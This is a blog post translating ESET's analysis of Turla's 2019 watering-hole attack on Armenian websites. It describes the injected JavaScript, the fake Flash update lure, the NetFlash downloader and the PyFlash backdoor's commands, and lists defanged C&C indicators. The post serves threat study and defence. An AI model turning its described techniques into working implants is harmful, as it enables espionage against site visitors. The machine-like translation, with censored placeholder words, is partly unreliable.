[Translation] APT Analysis Report: 05. Turla New Watering Hole Attack Backdoor (NetFlash and PyFlash)

This is a new column created by the author. It mainly translates articles of APT reports from well-known foreign security vendors, understands their security technologies, and learns their methods of tracing the APT organization. I hope it will help you. The previous article shared a new fileless APT attack Kraken, which uses the Windows error reporting service to evade detection. This article will introduce Turla’s new watering hole attack backdoors (NetFlash and PyFlash). Researchers discovered that Turla launched a watering hole attack on Armenian’s well-known websites. By forging Adobe Flash updates, the victim was deceived to download two new malware NetFlash and PyFlash. In order to achieve a malicious attack, the TTP of the entire attack has basically not changed, but Turla used the Python backdoor for the first time.

• 原文标题：Tracking Turla: New backdoor delivered via Armenian watering holes
• Original link: https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/
• Article author: Matthieu Faou
• Release time: March 12, 2020
• Article source: Welivesecurity.com
• Recommended articles: https://www.freebuf.com/articles/network/230436.html

---

1. What is a puddle attack

Watering Hole (Watering Hole) is one of the hacking methods. It sets up a "watering hole (trap)" on the way the victim must pass. The most common method is for hackers to analyze the regularity of the attack target's Internet activities, look for the weaknesses of the attack target's frequently visited website, first "break" this website and implant the attack code, once the attack target visits the website, it will "success". Because this kind of attack relies on the website trusted by the target group, the success rate of the attack is very high, even those groups that have the ability to defend against spear attacks or other forms of phishing attacks are easy to be deceived.

Watering hole attacks are a type of APT attack. Compared with phishing attacks, hackers do not need to spend energy on making phishing websites, but instead use the weaknesses of legitimate websites, which are more concealed. Today, when people’s security awareness continues to increase, hackers deliberately create phishing websites but are easily spotted by those who are interested, while watering hole attacks take advantage of the attacked’s trust in the website. The watering hole attack uses the weakness of the website to implant attack code. The attack code uses the flaws of the browser. When the attacked visits the website, the terminal will be implanted with malicious programs or directly stolen important personal information.

Watering hole attacks are more deceptive and more efficient than using social engineering to lure target users to visit malicious websites. The watering hole method is mainly used for targeted attacks, while 0day vulnerabilities in Adobe Reader, Java Runtime Environment (JRE), Flash and IE are used to install malware. The following figure shows the basic flow of a watering hole attack.

Watering hole attacks are widely used in attacks launched by APT organizations, such as OceanLotus, Tula, APT-C-01, etc., and mainly exhibit two characteristics:

• Most of them are APT attacks, and the targets are mostly employees or websites of large and important companies
• Use more 0-day vulnerabilities, such as Adobe Flash high-risk vulnerability CVE-2018-4878

At the end of 2012, the website of the Committee on Foreign Relations of the United States suffered a watering hole attack; in early 2013, well-known high-traffic websites such as Apple, Microsoft, New York Times, Facebook, and Twitter were recruited one after another. Domestic websites are also hardly immune. In 2013, Tibet's ZF website suffered a watering hole attack; in 2015, domestic well-known websites such as Baidu and Ali also suffered watering hole attacks due to JSONP vulnerabilities.

• Recommended article: APT's Watering Hole Attack-Romi Weixiong

So, how to defend against puddle attacks?
In response to this type of attack, it is important to educate users so that they are aware of this type of attack and its harmfulness. The more cautious they are when they are asked to click on the link, the better. Secondly, the organization itself must be vigilant and adopt more advanced methods to detect and counter attacks. At the same time, installing the necessary security software can effectively identify malicious fake software.

---

2. Turla organization

Turla, also known as Venomous Bear, Waterbug, and Uroboros, is one of the most advanced threat organizations to date, and is considered to belong to the Russian ZF (all members of the organization speak Russian). Although the organization is believed to have been established at least in 2007, it was not discovered by Kaspersky Lab until 2014. This is mainly because the organization has been proven to be able to use inherent security loopholes in satellite communications to hide the location and control center of its C&C server.

We all know that once the location of the C&C server is exposed, the operators behind the scenes will be easily spotted. Therefore, the Turla organization's ability to hide its position and implement JD activities. A survey conducted by Kaspersky Lab in 2017 showed that compared to 2015, the Turla organization has increased the number of satellite C&C registrations by at least ten times.

The famous cyber espionage organization "Moonlight Maze" (Moonlight Maze) in the 1990s is the predecessor of Turla APT today. They all have a lot of the same technical means, and they are all related to the Russian ZF hackers. On October 7, 1996, the Colorado School of Mines network was hacked. The attackers invaded a computer nicknamed "Baby_Doe" in the Brown Building of the school through a vulnerability in the Sun OS4 operating system. They used this computer as a relay to invade the headquarters of the National Aeronautics and Space Administration, the U.S. HAI Army, and the KONG Army. Universities and military institutions across the United States.

A joint investigation by multiple departments in the United States found that the intruder had obtained a large amount of American JM information from helmet design to atmospheric data, and the height of the printed manuscript was comparable to the Washington Monument. As the investigation continued to deepen, the ultimate source was the Russian TG behavior. Since its invasion activities were mostly carried out at night and given the complexity of its behavior, it was named "Moonlight Labyrinth." This network intrusion is the first known network APT attack in history. Since then, people have also realized that Internet JD and Internet Z are not just tricks in Hollywood movies, but a real existence. "Moonlight Labyrinth" opened the chapter of online JD and became a classic case in many hacker books.

In network intrusion activities, hackers generally use relays or jumpers as attack agents to prevent traceability investigations, and "Moonlight Labyrinth" intruders are also the first to adopt this technology. They use a series of computers in universities and libraries in many countries that have system vulnerabilities as transit springboards, store attack tools, and launch cyber attacks to confuse investigations.

Since 2007, the Turla organization has been active and has caused many momentous events. For example, in 2008, he was accused of attacking the US Department of ZYSLB, the Buckshot Yankee incident-a piece of malware named "agent.btz" was uploaded to the jun thing network system of the Wu corner building through a USB flash drive. Another incident occurred in 2016, which was a large-scale cyber attack on the Swiss JG company RUAG Group. In this attack, Turla used a combination of network JD software Epic Turla (a branch of the Turla software family, known as "the most complex APT spyware in history"), Trojan horse programs, and Rootkit malware. In addition, the organizations that have been attacked by Turla are far more than this, including Ukraine, the governments of the European Union, and embassies, research and education organizations, and pharmaceutical and military companies.

According to Kaspersky Lab, Turla has mainly used the following attack tools over the years:

• IcedCoffeer and KopiLuwak
• Carbon
• Mosquito
• WhiteBear
• LightNeuron

Since 2015, Turla has begun to use Javascript, powershell, and wsh in a variety of ways, including the download and installation of malware, and the implementation of a complete backdoor. After being decrypted by the VBA macro code, the White Atlas framework usually uses a small Javascript script to execute the malware dropper payload, and then delete the dropper to erase traces. For the release of the Firefox extension backdoor developed by Turla, the White Atlas framework uses a more complex and highly obfuscated Javascript script, which is still responsible for writing the extension.json extension configuration file and then deleting itself.

So, how to trace the APT organization? Here is a brief supplement.

• Turla APT and the early worm virus Agent.BTZ are highly related. At the
  2015 VirusBulletin conference, Kaspersky researcher Kurt Baumgartner said that Turla APT is highly related to the early worm virus Agent. The hijacking attack on satellite infrastructure is very similar to the later Turla. "Turla logs will generate the same file names as Agent.btz (mswmpdat.tlb, winview.ocx and wmcache.nld) and save them in the compromised system. Turla also uses the same XOR key as Agent.btz. The log file is encrypted."
• The watering hole attack in this article is very similar to Turla's watering hole attacks in the past few years,
  especially the operation method is similar to an attack discovered in 2017. The various JavaScript fragments used there are almost the same as in this attack, but the target It is different from the payload.
• KopiLuwak script is decoded by macro code, which is very similar to IcedCoffee.
  In November 2016, Kaspersky Lab observed a new round of weaponized macro documents. These macro documents released a new, highly obfuscated Javascript payload, KopiLuwak. The targets of this new attack tool are the same as those previously targeted by Turla (that is, ZF in European countries), but its deployment is more targeted than IcedCoffee.
• "Moonlight Labyrinth" attackers
  made some subtle mistakes due to their low level of English and Russian proficiency . For example, during the reverse engineering of a program, they discovered that the PDB program path contained Max, who may be a member of the attack program development. , Iron and Rinat. Although these programs may be compiled and developed on the victim's machine, the three names still exist in the /myprg/, /mytdn/, and /exploits/ paths. It is worth noting that the member named Iron is involved in the development of the early client program cli of the LOKI2 backdoor. In addition, a Russian word "vnuk" named "grandchild" or "grandson" can be found in the PID information of a process called twice.

references:

• Kaspersky: In-depth exposure of Russian APT organization Turla
• Kaspersky: Demystifying the reincarnation predecessor of Turla APT

---

3. Target website

In this attack, Turla compromised at least four Armenian websites, including two websites belonging to ZF. Therefore, its targets may include government officials and politicians. The following sites were compromised:

• armconsul [.] ru: Consular Office of the S consulate of Armenia, Russia
• mnp.nkr [.] am: Ministry of Nature Conservation and Natural Resources of Artsakh
• aiisa [.] am: Armenian Institute of International and Security Affairs
• adgf [.] am: Armenian Deposit Guarantee Fund

ESET research indicates that these sites have been hacked since at least the beginning of 2019. We notified Armenian National CERT before the release and shared the results of our analysis with them. Turla used illegal access to insert malicious JavaScript code into the website. E.g:

• For mnp.nkr [.] am, the obfuscated code is appended to the end of jquery-migrate.min.js (common JavaScript library), as shown in the figure below.

This code loads external JavaScript from "skategirlchina[.]com/wp-includes/data_from_db_top.php". We will analyze this code in the next part. Since the end of November 2019, we have noticed that Skategirlchina [.com] no longer distributes the malicious script. It may be that Turla hackers have suspended the watering hole attack.

---

4. Fingerprint identification and transmission chain

After visiting the infected webpage, skategirlchina[.]com will implant the second stage of malicious JavaScript and fingerprint the visitor’s browser. The following figure shows the main functions of this script.

• Execute the script for the first time
  If this is the first time the user's browser executes the script, it will add an evercookie with a random MD5 value provided by the server, which is different each time the script is executed. evercookie is implemented based on GitHub code. It uses multiple storage locations (such as local databases, local shared object Flash cookies, Silverlight storage, etc.) to store cookie values. Compared with regular cookies, its persistence is higher, because if the user just deletes the browser's cookie, it will not be deleted.

• Second visit to the infected website
  This evercookie will be used to identify whether the user has visited the infected website again. When the user visits for the second time, the previously stored MD5 value can be used to identify the behavior of the second visit. Then, it will collect the browser plug-in list, screen resolution and various operating system information, and send it to the C&C server by POST. If there is a reply, it is considered to be JavaScript code and executed using the eval function.

If the attacker is interested in the infection target, the server will reply with a JavaScript code that creates an iframe. Data from ESET research shows that Turla was only interested in a very limited number of visited websites in this event. The iframe will then display false Adobe Flash update warnings to users in order to trick them into downloading malicious Flash installers. The image below shows a fake Adobe Flash update iframe.

The security research group did not observe any browser vulnerabilities exploiting techniques, and this activity only relied on social engineering skills. The malicious executable file is downloaded from the same server as the JavaScript of the iframe. If the user manually launches the executable file, Turla malware and the legal Adobe Flash program will be installed.

The figure below shows the transmission process of the malicious payload from the initial visit to the infected Armenian website. The whole process is relatively clear. After visiting the infected webpage, skategirlchina[.]com will implant malicious JavaScript and add fingerprints to the visitor’s browser; then use a watering hole attack to induce the victim to click the Adobe Flash update, and then load the Turla malicious Software and legal Flash programs are engaged in the implementation of subsequent attacks.

---

Five. Malware

When the user executes the fake installer, it will execute Turla malware and the legitimate Adobe Flash installer at the same time. Therefore, the user may think that the update warning is legitimate.

1. Before September 2019: Skipper

Before the end of August 2019, the victim will receive a RAR-SFX archive containing a legal Adobe Flash v14 installer and another RAR-SFX archive. The latter includes various components of the backdoor, namely Skipper. Previously attributed to Turla, it was recorded by Bitdefender researchers in 2017, while the latest version was recorded by Telsy in May 2019.

In view of the small changes between the document version and the latest version, we will not provide a detailed analysis here. An interesting change is that the Skipper communication module uses the server hosting the remote JavaScript and malicious binaries of the campaign as its C&C server, in particular:

• Skategirlchina [.com / wp-includes / ms-locale.php

2. From September 2019: NetFlash and PyFlash

At the end of August 2019, we noticed a change in the payload delivered by skategirlchina [.com].

(1) NetFlash (.NET downloader)
A new malicious payload was discovered at the end of August 2019. The new malicious payload is a .NET program. It deletes the Adobe Flash v32 installer in %TEMP%\adobe.exe and deletes it in %TEMP%\winhost.exe NetFlash (.NET download program). According to its compilation time stamp analysis, the malicious sample was compiled at the end of August 2019 and early September 2019, and then uploaded to the C&C server of the watering hole attack.

NetFlash downloads its second stage malware from a hardcoded URL and uses Windows scheduled tasks to establish persistence for the new backdoor. The following figure shows the main functions of NetFlash, which can download the second stage malware called PyFlash. We also found another NetFlash sample, which may be compiled at the end of August 2019, with a different hard-coded C&C server:

• 134.209.222 [.] 206:15363

(2) PyFlash
The second stage backdoor is the py2exe executable file. py2exe is a Python extension used to convert Python scripts into standalone Windows executable files. As far as we know, this is the first time Turla developers have used Python in the backdoor.

The backdoor communicates with the hard-coded C&C server via HTTP. At the beginning of the script, the C&C URL and other parameters used to encrypt all network communications (such as AES key and IV) are specified. As shown in the figure below, the PyFlash Python script is displayed. Global variables.

The main function of the script (as shown in the figure below) sends information about the computer to the C&C server, and also includes the output of OS-related commands (systeminfo, tasklist) and network-related commands (ipconfig, getmac, arp). The following figure shows the main functions of PyFlash.

The C&C server can also send backdoor commands in JSON format. The commands implemented in this version of PyFlash are:

• Download other files from the given HTTP(S) link.
• Use the Python function subprocess32.Popen to execute Windows commands.
• Change execution delay: periodically modify (every X minutes; the default is 5 minutes) to start the Windows task of the malware.
• Uninstall malicious software. To confirm the instruction, the malware uses the following string to send a POST request to the C&C server.

Then, the output of the command is sent back to the operator via a POST request and encrypted with AES.

---

Six. Conclusion

Turla still regards the watering hole attack as one of its initial invasion strategies. This attack relies on social engineering techniques, using false Adobe Flash update warnings to trick users into downloading and installing malware. On the other hand, the payload has changed, possibly to avoid detection, the malicious payload (payload) is NetFlash, and a backdoor named PyFlash is installed, which is developed in Python.

We will continue to monitor Turla's new activities and will post relevant information on our blog. If you have any questions, please contact us at threatintel [@] eset.com, which can also be found in our GitHub repository.

IoCs：

• Compromised website

• C&C server

sample:

MITRE ATT&CK frame technology

• Follow-up authors will share an article detailing the application of ATT&CK framework in APT organization

Finally, I hope this article is helpful to you. I feel that Python backdoors and watering hole attacks are quite interesting. You can try to reproduce related functions if you are not busy in the follow-up. Today is 1024. I still like the article "The Ten Years of CSDN and Me" a year ago. How many decades are there in life! The laboratory has gone crazy recently, and today finally Yu can go home to accompany the goddess. The road is long and long, continue to cheer, cherish the moment, and prepare to go home~ This article is written on the high-speed rail G401, come on!

Previous share:

• [Translation] APT analysis report: 01. Overview of targeted APT attacks under Linux
• [Translation] APT Analysis Report: 02. Phishing Email URLs Confusing URLs to Avoid Detection
• [Translation] APT Analysis Report: 03.OpBlueRaven exposes Fin7/Carbanak (Part 1) Tirion malware
• [Translation] APT Analysis Report: 04.Kraken-New Fileless APT Attacks Use Windows Error Reporting Service to Avoid Detection
• [Translation] APT Analysis Report: 05. Turla New Watering Hole Attack Backdoor (NetFlash and PyFlash)

The newly opened "Nazhang AI Security Home" on August 18, 2020 mainly focuses on Python big data analysis, cyberspace security, reverse analysis, APT analysis reports, artificial intelligence, Web penetration, and offensive and defensive technology. At the same time, it will share CCF, Algorithm implementation of SCI, South and North nuclear papers. Nazhang’s House will be more systematic, and will reconstruct all the author’s articles, explain Python and security from scratch, and have written articles for nearly ten years. I really want to share what I have learned and felt. I would also like to invite you to give me your advice and sincerely invite your attention! Thank you.

(By: Eastmount 2020-10-24, written on the high-speed rail at 8pm on Saturday, http://blog.csdn.net/eastmount/ )